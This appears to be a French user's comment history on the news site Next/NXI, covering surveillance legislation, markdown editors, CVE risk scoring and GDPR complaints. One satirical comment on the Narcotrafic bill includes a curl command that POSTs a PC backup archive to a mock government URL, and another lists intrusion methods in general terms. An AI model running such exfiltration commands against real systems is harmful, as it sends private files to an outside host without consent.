Edit : fix typos Edit 2 : Merci Marc pour cet article qui, même si je vais encore m’énerver contre ma cafetière, est comme toujours clair et instructif
Mais c’est comme tout, les gens oublient vite si on ne leur rappelle pas, donc ils ont oublié ce combat . Et comme les médias sont passés à autre chose très vite, poof, plus rien.
Je viens de faire des stats ultra précises et fiables : globalement NXI et numérama en ont parlé pas mal en novembre 2020, depuis quelques jours parce que ça passe au sénat, et quasi rien entre les 2. Alors les médias mainstream…
Maintenant, certaines personnes gueulent, mais chez soi.
Donc en tldr, ça passe crème*
Tchoubzisouslol
* Ce que je ne remet pas en cause. Par contre, je remet en cause le fait qu’ils n’aient parlé QUE de cet article, alors que ce n’est clairement pas le seul dangereux
Bon j’exagère, comme dit par d’autres, le covid/couvre feu/confinement/les fêtes de noël/whatever sont passés par là et a permis de restreindre les manifs.
* On notera que je suis pessimiste/réaliste (au choix), et que je considère que, de base, à partir du moment où le gouv pousse une loi, à moins que ça touche au fric des péons français, on est foupoudav.
Question bête. Quid des plateformes de discussions ? Je pense principalement à discord, IRC, mais on peut également imaginer les groupes telegram publics ou d’autres.
De plus, de ce que j’en compris, la CNIL a dit “hey ho, on va s’calmer Jean Michel Bercy, mais on a dit public, pas ‘avec un compte’”, mais pour l’instant, le fameux Jean Michel Bercy n’a rien répondu et n’est pas dans l’obligation d’accepter la demande de la CNIL ?
Bah voilà, on y est -_- On sort clairement du sujet de base, mais ça me saoule un peu toutes ces “nouveautés” qui font qu’internet devienne une usine à gaz
Le
12/11/2020 à
18h
03
j’ai vu ToastUI editor, mais à la base, c’est surtout un plugin pour un éditeur intégré dans un site web. Pour avoir son éditeur, j’ai l’impression qu’il faille juste ecrire une page html comme ceci dans le bon dossier
L’un des soucis dans un page web, c’est qu’il n’y a pas accès forcément à tous ce qui est lié à ton OS (genre ne serait-ce que pour enregistrer)
Pour la sauvegarde, à la limite, suffit de mettre ça dans le local storage du browser, et quand je veux récupérer un fichier j’exporte simplement le local storage :) Et je ne doute pas une seule seconde que Google sorte un de ces jours une API JS pour pouvoir écrire directement sur le disque… (A mon plus grand malheur mais ceci est une autre histoire)
Bon cela dit je crois qu’on s’éloigne un peu du sujet de base
Le
12/11/2020 à
16h
01
En soit, le markdown (MD), c’est une simple surcouche de l’HTML (tu peux écrire en HTML dans un fichier MD) en rajoutant des macros simple et visuellement lisible en mode texte (même dans un bloc note, le texte en MD pur devrait être “bien formaté”). Si tu fait un éditeurs qui supporte MD avec preview, tu es obliger d’avoir au moins un moteur de rendu HTML/CSS.
L’HTML appelant naturellement le Javascript, de nombreuse extension de MD courantes (les formule Latex, la coloration syntaxique de code sources, mermaid… ) ont des bibliothèque Javscript qui fonctionne très bien.
Ainsi dès que l’on veut faire du MD, si tu n’as pas envie de recoder tout, tu prends un moteur HTML/CSS+JS, donc rien que ça, on s’éloigne du truc léger. Ensuite, ce genre d’éditeur, c’est le projet d’une poignée de gars qui n’ont pas forcément les moyen de réinventer la roue. C’est pour ça que ce genre d’éditeur utilise souvent Electron qui leur permet avec leur peu de moyen de faire un éditeur MD convainquant.
Tu marques un point sur la partie recoder un moteur HTML/CSS/JS :)
Cela dit, quitte à devoir charger tout un moteur de rendu, autant que j’utilise mon browser avec une webapp locale, ça me coûtera aussi cher en ram, mais je n’aurais pas besoin d’installer un N-ème soft ^^
Le
12/11/2020 à
14h
45
J’utilise Jekyll + github pages. Coté Jekyll une fois que la configuration initiale est faite (c’est un peu chiant, mais ça se fait quand même) et que le CSS est en place, t’as plus à y toucher.
Quand tu veux écrire un article, tu mets ton .md dans l’arbo jekyll, puis jekyll ; et les commandes git classiques pour pousser sur GH Pages.
Le
12/11/2020 à
14h
14
Merci pour cet article.
J’utilise -quand je prend le temps, c’est à dire une fois dans l’année- jekyll pour écrire des blogposts. Jusqu’à présent j’ai toujours utilisé Sublime Text, en écrivant le md en brut, puis en compilant le blogpost avec les commandes jekyll pour voir le résultat via le browser. Pas pratique pratique… Comme je ne m’attelle pas à l’exercice tous les matins, cette solution était “viable”, mais un véritable éditeur markdown est une bonne idée.
Du coup, quelques questions me viennent à l’esprit :
Y aura-t-il des tests d’autres éditeurs ?
Je sais que ce n’est pas le but principal de sublime text, mais je viens de voir qu’il peut servir d’éditeur markdown via des plugins. Ca rentre dans le cadre d’un prochain article du comparatif ?
Electron aka comment prendre 5po de disque et 10to de ram pour un soft qui demande au final 1mo de disque et ram. Des tests prévus sur des apps non electron ? J’avoue que ce point me rebute totalement
Pour info, je n’ai pas -encore- lu les 2 autres articles, sur simplenote et zettlr, je n’ai pas tous les éléments du comparatif du coup ^^’
Bien bien bien… J’en viens à être content de la pandémie de covid, on a au moins le droit de se masquer -temporairement- le visage… (Ceci était moitié une blague moitié un c’est-triste-mais-c’est-quand-même-la-réalité)
Plus sérieusement, merci @marc rees pour rendre le tout compréhensible par le commun des mortels.
“Prochaine étape, le 17 novembre, en séance.”
Ca veut dire quoi ? Maintenant que le texte est passé en commission, il passe en séance, et après hop, emballé c’est pesé, ajoutez moi ça au dalloz ?
J’avais déjà posé la question dans le précédent article, mais du pas eu de réponse : quel recours a-t-on ? J’ai étonnamment l’impression que tout le monde s’en fout de cette loi : je n’ai pas réellement vu d’articles de presse, de journaux, etc en parler.
La PPL devait être examinée hier, a-t-on des nouvelles ? J’ai vu passer un thread de @marc ress sur twitter, mais c’est un peu décousu :/
Le
03/11/2020 à
18h
49
C’est la Liberté qui pleure.
Le
03/11/2020 à
09h
50
Le fait de me (ré)abonner à NXI, chose que je voulais +/- faire depuis longtemps a été totalement influencé par cet article (et son thread twitter associé), gg @Marc Rees Bon, ça, c’est dit :) Maintenant, mes questions !
Je ne comprend pas pourquoi tout ça ne fait pas plus de bruit : hormis un post de LQDN et un article sur mediapart (en plus de celui ci, of course), je n’ai pas réellement vu d’analyse ou d’article de presse qui levait le point (poing ? ) et des dangers clairs que cela pouvait apporter. Hormis le fameux “omg il y a le covid, arrêtons de parler du reste et ne parlons que de ça”, je ne vois pas pourquoi personne n’en parle… Si quelqu’un a une idée…
De ce que j’en ai compris (c’est à dire pas tant que ça… ^^‘), cette PPL doit être examinée demain (C’est à partir de mercredi que les députés réunis en Commission des lois ausculteront les 340 amendements officiellement déposés.). Je comprend bien les raisons sous-jacentes/officieuses de la faire passer aussi vite. Mais le gouvernement a t-il au moins essayé de trouver un semblant de justification valable ? Ou alors il est carrément en mode “ah mais on s’en fiche de ce que vous pensez, on la fait passer en scred pendant le confinement pour que personne n’en parle, et même pas nous” ?
Enfin, qu’est ce qu’on peut faire ? Je n’aime pas trop trop l’idée de cette PPL qui rogne encore plus nos libertés, et je suis partant pour faire quelque chose, mais quoi ? Les manifs, ça ne marche pas, les pétitions, ça ne marche pas, du coup, qu’est ce qui marche ? Quels recours peut-on avoir ?
Edit : il y a moyen de tagguer les gens via un @ ?
100 commentaires
La proposition de loi Narcotrafic fustigée pour ses portes dérobées dans le chiffrement
28/02/2025
Le 01/03/2025 à 20h 13
Je vais m'empresser de lire tout ça, merci !
Le 01/03/2025 à 12h 57
- installation de mouchards physiques sur le PC/smartphone de la cible lorsqu'elle lâche son équipement
- installation d'application sur le PC/smartphone via un accès physique au téléphone (la mallette Celebrite, c'est magique)
- utilisation de vulnérabilités connues (ou non) de type 0 click RCE
- social engineering
- infiltration dans la chaine de transport afin d'accéder aux équipements avec leur mise en vente (ça c'est déjà vu avec la NSA
Le "comment" est à vue de nez laissé à la discrétion des personnes autorisées (la DGSI en somme). Maintenant, c'est certain que mes solutions ne permettent pas une écoute à grande échelle.... Pour l'instant
Sans tomber dans la paranoïa, si demain google/apple/MS permet à un gouvernement de déposer une petite backdoor des familles*, le gouvernement aura déjà préparé le terrein depuis des années et la DGSI pourra sortir cet article et dire "Bah quoi ? On a le droit, c'est tout bon"
*Je ne dis pas que c'est fait, pas fait, que ça se fera, que ça ne se fera pas hein. Je pars juste sur une hypothèse.
Le 01/03/2025 à 12h 45
Je n'ai pas l'impression que l'article de loi parle du 2eme cas.
Pour moi*, la loi que j'ai linkée définit :
- la mise en place d'un dispositif technique : c'est suffisamment large pour qu'on puisse parler d'un mouchard physique sur l'ordi, de l'installation d'un software, voire de l'utilisation d'une vulnérabilité permettant l'exécution de code
- sur un système informatique : comprendre ordinateur, smartphone, box FAI, ou tout autre équipement avec un processeur
- permettant de sauvegarder et transférer les données : curl http://dgsi.gouv.fr/onsefaitponcer -XPOST --data-binary "@backup_de_ton_pc.gz"
- données affichées, écrites au clavier, reçues ou émises par des périphériques : grosso modo tout ce qui transite sur un canal d'entrée/sortie. Du coup, caméra et micro, ça rentre dans la définition
*Attention, je suis expert en droit uniquement le soir en rentrant du bar
Autrement dit : je fais une analyse qui me semble juste mais à tout moment je me gaufre, et je suis évidemment ouvert à la critique et à la discussion bienveillante :)
Le 28/02/2025 à 20h 09
Sont quand même vachement cons sur la partie qui parle d'activer les micros et caméras... C'est déjà autorisé depuis LOPSSI 2 de faire ça ! ( wikipedia et l'article de loi )Est ce que c'était déjà honteux à l'époque ? Oui.
Est ce que ça l'est toujours autant ? Oui.
Est ce que 99.99% de la population s'en tartine la babouche ? Oui (malheureusement)
Caisse des dépôts (Ircantec) piratée, des données de 70 000 personnes dérobées
14/02/2025
Le 14/02/2025 à 08h 17
Fuite*"Ensemble, faisons grandir la Fuite".
Aux États-Unis, une explosion des recherches de VPN avec les restrictions sur le porno
07/01/2025
Le 07/01/2025 à 19h 00
A tout moment, Aylo propose une offre VPN à prix réduit, avec trafic offert vers PHQuand des pharmacies demandent d’envoyer les ordonnances sur… Gmail ou Hotmail
11/12/2024
Le 11/12/2024 à 19h 05
A 2 doigts de scripter un truc qui va récupérer tous les mails via l'API streetview/maps pour envoyer à toutes les pharmacies de france(non)
Patch Tuesday : nombreuses failles corrigées dans Windows, dont une déjà exploitée
11/12/2024
Le 11/12/2024 à 12h 04
A la limite ils vont juste dire à crowdstrike "ok les gars vous pouvez publier votre write UP"
Le 11/12/2024 à 09h 20
C'est une spécialité ça chez MS, de rester cryptique sur les vulnérabilités.Entre les phrases ultra génériques, les vulns tagguées RCE "parc que c'est local mais si l'utilisateur exécute le payload bah ça devient remote", l'absence totale des prérequis nécessaires, etc, c'est une tannée de comprendre leurs bulletins
Le nouvel Outlook obligatoire en avril 2026 pour les comptes Microsoft 365 Enterprise
09/12/2024
Le 09/12/2024 à 09h 35
Le 09/12/2024 à 09h 34
Il y a encore peu (moins de 2 ans), le nouvel outlook en mode appli ne savait pas ouvrir des .emlJe répète :
un client email
qui ne sait pas
ouvrir des
emails.
Après, on s'étonne que les end users ne comprennent rien à rien
Les données médicales et personnelles de 750 000 Français sont à vendre
19/11/2024
Le 20/11/2024 à 09h 28
Rigolo, mais dommage qu'il en manque un paquet, il n'y a même pas free ^^'Le ministère de la Justice américain pousse pour que Google soit obligé de vendre Chrome
19/11/2024
Le 20/11/2024 à 09h 25
C'est donc Meta qui juge Google ?Quelles étaient les probas que ça arrive ?
Internet Archive piratée, les données de 31 millions d’utilisateurs sont touchées
10/10/2024
Le 10/10/2024 à 09h 03
On espère qu'ils avaient... Des backups de leurs serveurs(Oui je sais, ils se sont pas fait chiffrer, mais là blague était drôle)
Action, Darty et Temu démentent avoir été victimes d’une fuite de données
24/09/2024
Le 24/09/2024 à 20h 03
Saxx a pas la meilleure réputation du monde dans la commu sécu (et pas que pour ses communications récentes, cf https://blog.cryptohack.org/twitter-secrets par exemple) ^^'Je comprends la facilité pour Next de le prendre comme source, mais c'est à mon sens un raccourci qui peut être contre productif, et qui pour moi décrédibilise le site
668e édition des #LIDD : Liens Intelligents Du Dimanche
22/09/2024
Le 22/09/2024 à 15h 38
Whoaaaaah, je suis cité sur Next !Je crois avoir vu la petite fenêtre "Achievement unlocked" en haut à gauche !
Merci d'avoir mis mon humble contribution dans les LIDD :)
Seb, si un jour tu veux d'autres liens/infos/échanges/whatever sur tout ce qui est game hacking, il ne faut pas hésiter une seconde, c'est un sujet qui m'intéresse fortement et pour lequel je peux à peu près passer 10 ans à en discuter ^^
De là à dire que ça pourrait être bien d'en faire une série d'articles...
Next lance Algorithmique, son premier podcast !
18/09/2024
Le 18/09/2024 à 19h 40
On a du croiser lesfluxcommentaires. Tu trouveras mes bugs/opti/remarques un peu plus bas :)Le 18/09/2024 à 19h 36
Alors alors :)Déjà, petit problème (sur brave au moins) avec le player :
- lancement du webplayer
- ctrl click sur un lien vers une autre page de next
- ouverture du nouvel onglet
Résultat, ça lit le podcast 2x, avec un léger décalage.
J'ai tendance à ouvrir à peu près 15 000 onglets (oui, je fais partie de ce genre de personnes), donc là je suis en PLS
Ensuite, le player est blanc, même avec le dark theme, pas que ça me change grand chose personnellement, mais si je me retourne, je crois voir à peu près tout Next qui est en train de sortir les armes là
Ensuite encore ensuite, qu'on aime ou pas les podcast, l'initiative est plus que louable
Etant donné que c'est une nouvelle "aventure" pour Next (et peut être pour toi Mathilde, je ne sais pas), ça pourrait être intéressant de faire un édito/série de posts/whatever sur le thème "comment on créé un podcast", non ? eg. choix du micro, isolation, comment gérer sa voix, etc ?
Ou alors, ça a juste été le micro du laptop sur le bureau et il n'y a rien à dire de plus ?
Sur le podcast en tant que tel :
- Entre 00:50 et 01:01, on a juste la musique de fond. Ca fait un peu long je trouve ^^'
- Sur le format podcast, dur de se faire un avis complet sur 2mn30
- Si c'est sur les plateformes de streaming, ça signifie que tous les podcasts seront en libre accès ? Ou certains seront uniquement pour les abonnés ? Ce qui induit que ceux ci ne seront pas sur lesdites plateformes ?
- ce n'est pas du tout un exercice facile pour m'y être déjà essayé, donc bravo ! Quelques petites remarques cela dit (il faut y voir ici des axes d'amélioration, je veux pas juste basher)
--- Je trouve que ça fait un peu trop lu des fois, par exemple :"on va parler biais des algorithmes [...] ca va être passionnant"
--- Dans le même ordre d'idée, le ton est un peu trop forcé des fois (eg. "Et depuis, c'est la folie", "un domaine qui qualifie aussi bien [...] applications")
--- Quel va être le format d'un épisode complet ? Des échanges avec d'autres personnes, donc quelque chose de dynamique ? (je sais que ce premier épisode dit que Next va interroger des gens, mais est ce que ça sera un résumé de ce qu'ils ont dit, ou alors ces personnes vont être interviewées dans le podcast ?)
--- FWIW, on m'a dit une fois qu'il faut faire un podcast comme si on parlait à un pote en face. Fais ce que tu veux de ça
--- Encore une fois bravo pour cet épisode d'intro en tout cas, le ton n'est pas monocorde et c'est pas facile ^^
Enfin... c'est l'équipe de Next qu'on entend à la fin ?
Edit : pas fou l'affichage des bullet points sur next en fait ^^'
#LIDD : une analyse de l’architecture de la Game Boy (Color)
18/09/2024
Le 18/09/2024 à 19h 18
Le 18/09/2024 à 09h 29
La ressource peut être étendue à de nombreuses consoles : https://www.copetti.org/writings/consoles/. Ce site est une vraie mine d'or pour faire une intro au HW de consoles.Il y a également ici https://lsdsecdaemon.com/game-hacking-links-repo/ une liste de plusieurs liens vers des ressources similaires, qui pourraient vous aider à faire pas mal de LIDD du coup, à coup de un LIDD par lien
Le nombre de failles de sécurité a augmenté de 30 % en 6 mois : beaucoup de bruit pour rien ?
16/08/2024
Le 16/08/2024 à 23h 03
Merci pour ton retour, toujours agréable de se dire que le lien journaliste/lecteur est fort sur Next !
Là où on diffère sur l'analyse, c'est que je vois le QVS comme un "remplaçant" (selon Qualys en tout cas) à EPSS, plus qu'un mix entre CVSS et EPSS, puisque le QVS semble prendre le même type de metrics
Btw, en soi, je n'ai rien contre QVS, il est déjà arrivé que des initiatives privées soient meilleures que des efforts communs, et in fine c'est le meilleur système qui prendra le lead que ça soit EPSS ou QVS. J'ai par contre quelque chose contre le "on est mieux" sans analyse complète, sans explication du fonctionnement et sans statistiques. Ca fait un peu vendeur de tapis pour moi
Ce qu'il faut c'est soit un beau paper, soit du temps pour que la commu se rende compte du meilleur système.
Je te rejoins par contre sur le fait que Qualys est une société effectivement de premier plan, aucun débat là dessus. D'ailleurs on le voit très bien au niveau technique, ils nous sortent des vulns bien vénères assez souvent (coucou regresshion),
Je te rejoins aussi sur le fait qu'EPSS est pour l'instant moins connu que CVSS. (un peu) plus compliqué à appréhender, beaucoup plus récent, les 2 premières versions étaient pas folles, c'est closed source, et c'est aussi moins vendeur de dire "Ya une nouvelle vuln critique mais l'EPSS est de 0.001" dans les sites putaklic ^^
Néanmoins, il commence à se démocratiser de plus en plus dans la commu.
(et oui c'est moi qui ai fait la remarque via le signalement
PS : et voilà, encore un message étoffé alors que je voulais juste te répondre rapidement
PS2 : Au passage, pour tous ceux que ça intéresse, le paper arxiv de l'EPSS : https://arxiv.org/pdf/2302.14172. Même si on n'a pas tout le détail, on apprend quand même une partie des metrics utilisées. Contrairement au QVS
Le 16/08/2024 à 18h 17
https://github.com/CVEProject/cvelistV5/ et https://www.cve.org/DownloadsDe là, tu devrais pouvoir récupérer la liste des CVEs avec kernel.org comme CNA et faire tes petites stats kivonbien :)
Après quelques checks rapides, il semble que le CNA soit "linux" dans les json GH.
Exemple pour la CVE-2024-42229 :
- https://www.cve.org/CVERecord?id=CVE-2024-42229 // on voit bien kernel.org comme CNA
- https://github.com/CVEProject/cvelistV5/blob/main/cves/2024/42xxx/CVE-2024-42229.json // dans les data json, le shortname est Linux
Le 16/08/2024 à 17h 57
Sur les failles publiquement exposées, il est possible de jeter un coup d'oeil via shodan/zoomeye/censys, mais tu n'auras par définition que des informations partielles et qui ne représentent pas la totalité des machines vulns mais que celles sur internet.De plus, cette solution, c'est à vérifier vuln par vuln, vu qu'elles ont potentiellement des spécificités différentes (versions spécifique, composant activé ou non, etc).
Tu peux aussi le faire proactivement et faire un gros nessus samer sur 0.0.0.0/0, mais je pense que tu vas avoir quelques soucis (autant légaux que techniques
, et non pas lego technics)Le 16/08/2024 à 13h 33
C'est totalement vrai. L'humain (COUCOU LE PHISHING ! COUCOU L'INSTALL DE SOFTS VEROLES SANS REFLECHIR) est un facteur important et doit être pris en compte. Il y a d'autres "types" de vulnérabilités (shadow IT, non conformités liées à de l'AD (mais pas que), sites customs mis sur internet avec des flaws, etc)Cela dit, l'article se focus sur les CVE ^^
Le 16/08/2024 à 13h 26
J'avais promis à Ferd que je me réabonnerai un jour. C'est maintenant fait, grâce à cet article, donc bien joué Jean !Pour en revenir à l'article : j'ai l'impression que le QVS est un indicateur de risque (donc plus proche de l'EPSS), plus qu'un indicateur de criticité (= CVSS).
Il est dommage que le QVS soit autant cryptique. Qualys ne semble pas donner beaucoup de détail sur ce scoring, à peine un "active exploitation, exploit maturity, and visibility on both the dark web and social media". En googlant un peu, on voit aussi d'autres params comme le CVSS ou le CISA KEV, mais ca va pas beaucoup plus loin malheureusement.
Ceux qui bossent dans la sécu vont me répondre "t'es bien gentil ElCroco, mais l'EPSS c'est pareil". Oui et c'est d'ailleurs un reproche que je fais à EPSS et c'est très chiant car on doit croire l'EPSS les yeux fermés.
Cependant :
- il est beaucoup plus large car non limité à Qualys : tout le monde peut l'utiliser
- le FIRST (à l'origine de l'EPSS) n'est pas une entreprise et n'a pas d'intérêt à gagner de la grosse thunasse. Donc j'y vois moins d'arguments commerciaux,
- l'EPSS prend en compte des métriques de nombreux acteurs de la sécu qui voient la réalité du terrain (eg. éditeurs EDR, MS, etc qui peuvent donner de manière précise le nombre de vulns réellement exploitées, alors que Qualys peut être pas...
De plus, le gars de chez Qualys est bien mignon, sauf qu'un EPSS de 0.9, c'est ENORME ! On sait que l'EPSS a une courbe plutôt logarithmique ( https://www.first.org/epss/articles/epss_percentiles.png ) donc il est normal qu'avec un EPSS en 0.9 il n'y ait que très peu de vuln. Par contre, vu qu'on n'a aucune idée de comment fonctionne QVS, il est compliqué de faire une comparaison (95/100 vs 0.9) vu de l'extérieur. Du coup, il peut bien sortir les chiffres qu'il veut, ça nous avance en rien x)
Le problème d'ailleurs, avec son analyse de 63% de vulns critiques par le QVS vs ~19% via EPSS, c'est qu'on ne sait pas où est la réalité ^^'
Est ce que ces 63% sont vraiment dangereuses et on va se faire péter soon, ou alors, est ce que seules celles de l'EPSS sont réellement dangereuses ? Je peux très bien pondre un indicateur custom qui dit que "moi j'ai raison, et pas l'EPSS".
Concernant les chiffres et leur évolution : il est impossible de revenir en arrière, on ne pourra pas avoir de baisse du nombre de CVE par an (en tout cas pas tant qu'on ne modifiera pas le système dans sa globalité), ou alors de manière conjoncturelle :
- il y a toujours plus de softwares
- la sécurité est toujours plus à la mode
- la FAME. Les "chercheurs en sécurité", faut pas oublier qu'une partie d'entre eux ils veulent juste être en mode kikitoodur à pouvoir dire "Regardez, j'ai trouvé plein de vulns, je suis donc forcément quelqu'un d'important"
Par contre, l'EPSS (ou même le QVS hein) est un outil intéressant car il permet de mettre en lumière la priorisation. "OK il y a 22k vulns, mais j'ai pas le temps de toutes les traiter, donc quelles sont celles que je dois faire en prio ?"
Ca se résume à "Si j'ai une fuite d'eau et un clou à planter chez moi, lequel je vais choisir en premier ?"
Une faille dans Google Workspace permettait de détourner des comptes pour s’authentifier ailleurs
30/07/2024
Le 30/07/2024 à 19h 37
Well, actually....Déjà, il faut clairment faire attention avec ce que disent les utilisateurs (cf le problème de 2012, ça me paraitrait tout de même étonnant que la cause soit identique)
Et puis Google n'a pas forcément menti. La vulnérabilité peut avoir été effectivement utilisée dès début juin. Peut être même avant. Peut être même en 2012 d'ailleurs.
Mais ce n'est pas un mensonge de dire qu'elle a été identifiée par Google fin juin. C'est juste qu'avant, Google ne l'avait juste pas... bah identifiée quoi ^^'
Le ticket créé par l'utilisateur début juin a peut être aidé à l'identification, mais la date de création du ticket ne correspond pas forcément à la date d'identification de la vulnérabilité.
6 mois, déjà
29/04/2024
Le 03/05/2024 à 12h 37
0/Je fais partie des radins !
Je me permets ici un petit message concernant la nouvelle UI, histoire de donner des retours à un site que j'apprécie.
Alors, oui je sais, résistance au changement, tout ça, mais, je trouve que la version mobile -celle que j'utilise principalement- a perdu en "âme". Je trouve pas réellement d'autre mot, mais globalement quand je me connecte sur le site, hormis le petit logo next, je n'ai plus l'impression d'être sur next, mais sur un bête site de news random : un fond blanc, une suite de titres parfois sans image (les briefs, j'ai bien compris que c'est la raison de l'absence d'image) et... et bah c'est tout en fait.
Rien qui me fasse dire "ouais, là je suis sur next, il fait chaud et beau, je me sens bien". Je trouve dommage d'avoir résumé la homepage au strict minimum.
Evidemment, ça n'enlève pas la qualité des articles (enfin, ceux que je peux lire x) ), mais juste, j'ai plus l'impression d'être à la maison quoi.
Enfin, je vais faire comme tout le monde : merci à toi ferd d'avoir repris le site ET de donner des news de manière transparente, merci à tous les journalistes de faire un travail de qualité depuis toujours, merci d'être aussi proche des lecteurs, et merci d'être un OVNI incroyable dans cette myriade de sites de news IT froids et sans âme (oui, j'y reviens
Tchoubz
Edit : homepage ou pas homepage, ça m'empêchera pas venir daily
Le poing Dev – round 6
27/11/2023
Le 28/11/2023 à 13h 41
Je prie tous les jours pour qu'il y ait toujours des bugs sur next, afin de pouvoir toujours avoir des poings dev hebdomadaires.Ils sont hilarants
Mention spéciale au "Franchement, à me relire là, je me demande bien comment on a pu livrer un site aussi pété, mais faut dire qu’on avait pris du citron aussi." ^^
Aux États-Unis, le danger des arrestations sur la seule foi d’un résultat algorithmique
23/11/2023
Le 24/11/2023 à 00h 38
Même avec des articles à 0 ou 1 commentaire, ça recharge la page. Peut être que l'équipe de dev a vu ça et c'est dit que ça ne servait pas réellement
Je te rejoins sur les notifs, ça me semble pas déconnant.
Je sais qu'il y a le GH pour les issues, mais ça serait top d'avoir la liste des features validées et mises dans le pipe par l'équipe de dev
Edit : pouvoir discuter facilement (via les comments ou les issues GH) est un vrai plus pour la communauté, c'est top :)
Le 23/11/2023 à 08h 51
Oh. Ctrl Maj R est un raccourci pour répondre à un commentaire tiens. Comme c'est la mode des tests suite à la MeP, j'en profiteJe ne voulais pas te répondre spécialement cela dit, juste recharger ma page sans cache ^^'
Edit : Ctrl Entrée pour valider le commentaire ne semble pas fonctionner cela dit
Gestion catastrophique des mots de passe par des sites et services : faites-nous part de vos expériences !
20/01/2023
Le 21/01/2023 à 11h 50
Merci pour ta réponse :)
Je suis déjà tombé sur services.cnil.fr, mais ça reste toujours un peu cryptique, ça semble souvent renvoyer vers des sites externes mais je trouve ça dommage.
Par exemple, pour mon histoire de newsletters que je reçois après avoir reçu validation par le DPO que mes données étaient supprimées ( https://www.lacitedesnuages.be/ pour ne pas les citer), je ne sais pas où aller. Depuis https://services.cnil.fr
Donc au final, pas de signalement à la CNIL, je trouve ça dommage pour un service qui doit être là pour nous.
Pour tes autres points, je suis partiellement d’accord avec toi : dans la théorie, un signalement devrait suffire. Dans la pratique, imagine un peu la quantité faramineuse de boulot que cela engendrerait : il me semble, sur le coté pragmatique, que ça soit plus simple de viser une entreprise pour laquelle de nombreuses plaintes sont remontées.
Dans la même veine, si la CNIL recoit juste des plaintes “XXX ils sont méchants avec moi” sans réelle preuve à l’appui, pareil niveau taf, ca doit représenter des montagnes de boulot. Sans compter les plaintes sur laquelle qu’on doit leur remonter et sur laquelle elle n’est aucunement compétente.
Même réponse qu’au dessus pour services.cnil.fr
Pour le point DPO, j’ai déjà fait de multiples demandes à des DPO, j’ai un peu tout et rien : des absences de réponses, des fois ça se passe très bien, des demandes (à mon avis déraisonnées) de vérification d’identité *
Je n’étais jamais tombé sur le formulaire de contact, je pense que je vais m’en service un peu plus souvent :)
* Demandes de CNI principalement, ce qui ne leur apporterait rien parce que je peux très bien falsifier n’importe quel scan de CNI d’une part, et ils n’ont jamais eu ma CNI à l’inscription d’autre part (coucou la fnac)
Le 21/01/2023 à 11h 14
9 pages de commentaires passionnés et passionnants, je n’ai malheureusement pas pris le temps de tout lire pour trouver la réponse à ma question
Je vais déborder un peu sur un sujet same same but different, il m’arrive, comme tout le monde, de recevoir des newsletters que je n’ai pas autorisé*, des mails alors que j’ai expressément demandé à être supprimé de la DB via une demande DPO, ou carrément des DPO injoignables ,etc. etc., qui sont des joyeusetés pas trop conforme RGPD.
Dans le même ordre d’idée que cet article (et celui de wekiwi), serait il possible d’envisager une série de posts sur les autres non conformité RGPD (comme celle que je viens de citer plus haut) ? Pas juste “regardez, c’est pas bien ce qu’ils font”, mais d’aller plus loin en donnant les clés pour remonter ces infos à la CNIL par l’intermédiaire de NXI (ou pas forcément d’ailleurs, en passant en direct, mais ça donnerait peut être moins de poids en direct).
Au passage, sans même attendre cette série d’articles (qui ne sera peut être jamais faite, je ne sais pas si l’équipe NXI lira mon message et se dira “OMG, mais ce ElCroco, c’est un génie, faisons ce qu’il dit et embauchons le par la même occasion”), pour les problématiques que j’ai cité plus haut, quelqu’un sait comment remonter ces infos à la CNIL ? Des fois on me dit “faut passer par signal-spam.fr”, des fois pas, des fois c’est par un form sur le site de la CNIL mais qui n’est pas totalement pour ma demande, etc. Je ne m’y retrouve jamais totalement, donc si quelqu’un sait comment signaler plus précisément, je suis preneur
* assez classiquement quand on me demande mon mail à un guichet pour recevoir les factures, alors que “promis, on ne vous enverra aucun mail”
Blocage publicitaire et Manifest V3 : les visions contraires de Chrome et Firefox
13/06/2022
Le 14/06/2022 à 11h 24
My bad, j’ai pas été assez clair, c’est moi qui étais hors sujet à répondre uniquement pour tiddlywiki et pas pour la news sur manifestV3 ^^
Effectivement, c’est pour TW5 donc pas possible pour toi, dommage :/
Le 13/06/2022 à 21h 31
Clairement hors sujet, mais j’utilise https://slaymaker1907.github.io/tiddlywiki/plugin-library.html pour sauvegarder mon tiddlywiki. Ca ne pourrait pas correspondre à ton besoin ?
Couplé à un onedrive/netxtcloud/whatever pour synchro et restauration, ça marche pas mal
Civitas aussi réclame l’action de l’ARCOM contre le porno en ligne
24/05/2022
Le 27/05/2022 à 23h 01
Et bien ma foi, je pense que nombre d’autres personnes ont déjà répondu à ma place, mais étant donné que tu t’es adressé à moi, je vais te répondre :)
Moi, on commence par une attaque ad hominem, ça commence fortement, tout en présupposant 3 choses : je suis un geek, je n’ai pas de gamin, et je me paluche tous les jours sur du porno
Revenons sur la dernière partie : en quoi regarder du porno gratuit ne serait pas un droit ? Regarder du porno, qu’il soit payant ou gratuit, n’est pas interdit à ce que je sache. Je suis majeur et vacciné, j’ai absolument le droit d’en regarder. L’article parle du fait d’interdire son accès aux mineurs, aucunement que celui ci doit être payant.
Et alors ? Quand bien même il y aurait des centaines d’associations de ce type, quel est le rapport avec mon propos ?
Je ne comprend pas le lien entre ce que j’ai dit (les personnes de cette asso -et probablement d’autres- en font un combat limite absurde) et le fait qu’il y ait plusieurs associations qui demandent l’interdiction au porno.
Le lien le plus simple que je vois -et excuse moi si j’ai mal compris, je te propose dans ce cas de définir plus amplement ton propos- c’est que “comme elles sont plein, c’est que cette demande est légitime”. Si c’est cela, et bien ma foi non, ce n’est pas forcément légitime et au besoin je pourrais te donner des exemples.
Ma foi, je n’ai pas de gamin, donc je ne suis, comme tu le laisses penser, pas le plus légitime pour en parler, et clairement à juste titre.
Je n’ai d’ailleurs jamais dit qu’il ne fallait pas protéger les enfants du porno. Bien évidemment que voir un boulard à 10 ans c’est pas fou, on est tous d’accord là dessus.
Par contre, à 15⁄16 ans, ça me choque moins. Est ce qu’à cet âge c’est grave ? Probablement pas tant que ça selon moi. On est au lycée à 15 ans, et les hormones ca tire dans tous les sens à cet âge. Le porno était moins accessible que maintenant à l’époque, et pourtant ça parlait de cul (et ça ne faisait pas qu’en parler ^^‘)
D’une manière générale, J’ai envie de dire que c’est une situation plus compliquée que juste “c’est la faute des parents”, “c’est la faute des sites X”, “c’est la faute du gouvernement”, etc etc.
Dire que c’est un manque d’éducation est peut être une partie du problème, dire que les sites pornos ne vérifient pas suffisamment est peut être une autre partie du problème, etc etc.
Maintenant, comment résoudre cette situation ? Je ne veux pas rentrer dans ce débat. Car je ne suis pas parent et que ce n’est donc pas mon job que d’y réfléchir.
